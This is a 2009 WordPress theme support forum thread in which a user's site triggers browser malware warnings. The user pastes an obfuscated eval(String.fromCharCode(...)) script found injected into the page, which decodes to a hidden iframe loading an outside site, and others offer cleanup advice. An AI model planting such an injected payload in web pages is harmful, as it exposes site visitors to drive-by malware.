Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme »

{Can this theme get hacked?

Old Mar 24, 2009, 05:12 PM
14 posts · Mar 2009
I've only been using this theme for a couple weeks, but today when I tried to log in to my blog using Safari, I get this error:

The website you are visiting appears to contain malware. Malware is malicious software that may harm your computer...
Old Mar 24, 2009, 07:02 PM
Flynn's Avatar
3,768 posts · Oct 2008
Munich, Germany
If you downloaded it somewhere else than from *.wordpress.org or *.bytesforall.com then someone may have added code.
Old Mar 24, 2009, 08:51 PM
14 posts · Mar 2009
I got it from wordpress.org.
Old Mar 24, 2009, 09:00 PM
Flynn's Avatar
3,768 posts · Oct 2008
Munich, Germany
It may be something on your desktop computer or your hosting account / web site.

1.) Do you have another computer where you can try to access your site (with the same browser type)?

2.) Try the "Default" theme and see if that throws that Safari warning as well
Old Mar 24, 2009, 11:29 PM
14 posts · Mar 2009
yep, happens when I switch themes, so it isn't the theme.

I don't begin to know how to fix something like this, but I noticed someone else having a similar problem on the wordpress forum today, so hopefully it will be addressed.

I noticed I don't get the error in firefox, but get it in safari. Also, when I looked at the source code on the page, I saw a script after the </html. tag that looked like this:

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32 ,102,103,103,103,101,51,61,34,115,105,34,59,118,97 ,114,32,119,51,52,53,61,34,112,108,34,59,118,97,11 4,32,114,101,54,61,34,97,110,107,46,34,59,118,97,1 14,32,114,114,61,34,99,111,109,34,59,118,97,114,32 ,97,61,34,105,102,34,59,118,97,114,32,115,61,34,11 6,116,34,59,100,111,99,117,109,101,110,116,46,119, 114,105,116,101,40,39,60,39,43,97,43,39,114,97,109 ,101,32,115,114,99,61,34,104,39,43,115,43,39,112,5 8,47,47,39,43,102,103,103,103,101,51,43,39,39,43,1 19,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114 ,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39, 43,39,39,43,39,34,32,115,116,121,108,101,61,34,100 ,39,43,39,105,115,112,108,97,121,58,110,39,43,39,1 11,110,101,34,62,60,47,105,102,39,43,39,114,97,109 ,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48, 49,50,49,55))</script>

I don't know how to delete it.
Old Mar 25, 2009, 09:38 AM
Flynn's Avatar
3,768 posts · Oct 2008
Munich, Germany
That code shouldn't be there, it looks like malicious code indeed. The author is hiding what the Javascript is doing. Try disabling you plugins one by one to see if it's caused by a plugin. Change your WP admin password. If that code doesn't go away consider re-installing a fresh Wordpress.
Old Mar 25, 2009, 12:07 PM
44 posts · Jan 2009
This is a SQL injection attack - I have had iit happen to me. It has nothing to do with the theme. You should search the wordpress extend plugin directory for security plugins. install the ones that help search and protect. One of them (I forget which and can't look right now) specifically searches for this kind of attack and tells you where it got put in. Essentially some malicious code has been added to one of your php files - often index.php or header.php - you have to manually edit out all the offending bits. Change your passwords and then look into using the other plugins to protect yourself again. Typically they will hit you again in about three weeks if it is like what happened to me.
Old Mar 25, 2009, 06:54 PM
2 posts · Mar 2009
I'm really confused: A few days ago I was getting from 50 - 200 uniques a day and all my pages were being indexed in google. The last few day I am getting zero, the header.php file doesn't have the Google meta tag in it anymore and I can't even find a </head> in there either. It looks like my whole blog has been hijacked cause it actually shows up inside another website! Beyond scary. I have no idea whats gone wrong. Any Ideas?


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Similar Threads
Thread Thread Starter Forum Replies Last Post
hacked? rachkitty Atahualpa 3 Wordpress theme 3 May 6, 2009 11:52 AM
Can this theme get hacked? lost all my traffic in one day! Trish Atahualpa 3 Wordpress theme 2 Apr 6, 2009 04:06 PM

All times are GMT -6. The time now is 06:56 AM.

Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.